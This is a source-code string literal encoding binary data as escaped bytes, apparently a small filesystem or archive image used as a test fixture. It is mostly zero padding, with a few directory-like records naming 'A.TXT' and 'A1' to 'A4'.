"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1D\xEF\x04\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x3E\xF5\xF5\x00". + "\xE3\x00\x00\x00\xF5\x00\x00\x00\xF3\x00\x16\x00\x00\x00\xF5\x00\x00\x7E\x00\xD5\xF3\x00\x14\x00\x00\x00\xF5\x00\x00\x7E\x00\xD7". 
+ "\xF3\x00\xE1\x00\x00\x00\xF5\x00\x00\x7E\x00\x22\xF3\x00\xCB\x00\x00\x00\xF5\x00\x00\x7E\x00\xD3\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x27\x2C\x0C\x4B\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x1F\xF4\xF4\x00\xFF\x00\x00\x00\xF4\x00\x00\x00\xF7\x00". + "\x0B\x00\x00\x00\xF4\x00\x00\x3F\x00\xE4\xF7\x00\x0A\x00\x00\x00\xF4\x00\x00\x3F\x00\xE5\xF7\x00\xFE\x00\x00\x00\xF4\x00\x00\x3F". + "\x00\x11\xF7\x00\xEB\x00\x00\x00\xF4\x00\x00\x3F\x00\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3A\xC3\x08\x72\x00\x00". + "\x00\x00\x00\x00\x00\x00\x42\x86\x2F\xA4\x6E\x80\x37\xE3\xF8\x00\x7C\x00\x2E\xFE\xF3\xB0\xA8\x68\x54\x26\x4A\x00\xE0\xBE\xBB\x82". + "\x34\xEE\xA6\xE3\xB1\x31\x5B\x00\x7C\x00\x0D\x00\x5E\x00\x5D\x06\xCF\xFC\x85\xF4\xA3\x6B\x3D\xC2\x5E\xE6\x95\xA6\x2B\xCB\x9B\x8C". + "\xC3\xA2\x18\x00\x71\x00\xC6\x29\xF7\x2B\x5D\x65\xA0\x67\x5F\x00\x1D\x87\x43\xF3\x1F\x2A\x69\x2E\x45\x70\x4C\x00\x84\x00\xE7\x00". + "\xAF\x00\xA9\xD5\x2D\x65\x7A\xFF\x81\xDF\xE9\xC1\x67\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x22\x01\x01\x00". + "\x00\x00\x00\x1C\x00\x01\x00\x00\x04\x00\x00\x00\x00\x1D\x00\x01\x00\x41\x00\x31\x04\x00\x00\x00\x00\x1E\x00\x01\x00\x41\x00\x32". + "\x04\x00\x00\x00\x00\x1F\x00\x01\x00\x41\x00\x33\x04\x00\x00\x00\x00\x20\x00\x01\x00\x41\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x95". + "\x67\x9D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x3C\xF5\xF5\x00\x00\x00\x00\xE3\x00\xF5\x00\x00\xF3\x00\x00\x00\x00\x16\x00\xF5". + "\x00\x7E\x00\xD5\xF3\x00\x00\x00\x00\x14\x00\xF5\x00\x7E\x00\xD7\xF3\x00\x00\x00\x00\xE1\x00\xF5\x00\x7E\x00\x22\xF3\x00\x00\x00". + "\x00\xCB\x00\xF5\x00\x7E\x00\xD3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6C\xA2\xA9\xBA\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\xF5\x1E\xF4\xF4\x00\x00\x00\x00\xFF\x00\xF4\x00\x00\xF7\x00\x00\x00\x00\x0B\x00\xF4\x00\x3F\x00\xE4\xF7\x00\x00\x00\x00\x0A". + "\x00\xF4\x00\x3F\x00\xE5\xF7\x00\x00\x00\x00\xFE\x00\xF4\x00\x3F\x00\x11\xF7\x00\x00\x00\x00\xEB\x00\xF4\x00\x3F\x00\xE7\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x37\xCE\x27\x00\x00\x00\x00\x00\x00\x00\x00\xEE\x86\x2F\xA4\x00\xEE\x00\xF4\x00\x49". + "\xA2\x30\x51\xFE\xF3\xB0\x00\xC0\x00\x23\x00\x5A\x32\xF0\x88\x3B\xD3\x30\x69\x42\x00\x4F\x00\x27\xB8\x26\x5C\x00\xE4\xBA\x00\xB0". + "\x00\xE0\x48\x3D\xD2\x06\x17\x30\x4C\xA0\x19\xA6\x2B\xCB\x00\x17\x00\xA0\x00\xB6\x51\x2F\xA6\x29\xF7\x2B\x00\x38\x00\x82\x00\x51". + "\xA6\x73\xF2\xC1\x75\x2F\x21\x8E\x00\xEC\x00\x2D\x4B\x3B\xAB\x00\xE0\x4F\x00\x74\x00\x87\xBD\xDF\x1A\x8D\x08\xD9\x9D\x74\x00\xFF". + "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x23\x01\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00\x08\x00". + "\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00". + "\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x01\x26\x00\x21\x00\x00\x00\x00\x00\x00\x21\x08\x00\x00\x00". 
+ "\x00\x00\x00\x08\x6D\x04\x01\x0E\x32\x24\xE4\x00\x00\x00\x01\x00\x00\x01\x05\x41\x2E\x54\x58\x54\x24\x00\x18\x00\x00\x00\x00\x00". + "\x00\x18\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x02\x41\x31\x00\x24\x00\x19\x00". + "\x00\x00\x00\x00\x00\x19\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x02\x41\x32\x00". + "\x24\x00\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01". + "\x02\x41\x33\x00\x24\x00\x1B\x00\x00\x00\x00\x00\x00\x1B\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00". + "\x01\x00\x00\x01\x02\x41\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
